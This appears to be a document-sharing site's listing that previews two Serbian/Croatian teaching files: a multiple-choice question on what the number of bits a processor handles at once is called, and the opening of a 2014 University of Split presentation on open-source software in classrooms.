Microsoft PowerPoint - PRI2014 KORIGOVANO [Compatibility Mode] 1. Broj bitova koji se jednovremeno prenosi i obrađuje unutar procesora naziva se: a) radni takt b) procesorski kod c) procesorska reč d) procesorski takt 1. Broj bitova koji se jednovremeno prenosi i

Више

Otvoreni kôd u ucionicama

Otvoreni kôd u ucionicama Otvoreni kôd u učionicama Ljiljana Despalatović 1 Borko Buković 1 Sveučilišni odjel za stručne studije, Sveučilište u Splitu, Hrvatska 19.studenog 2014. Slobodni softver Slobodni softver (engl. Free Software,

Више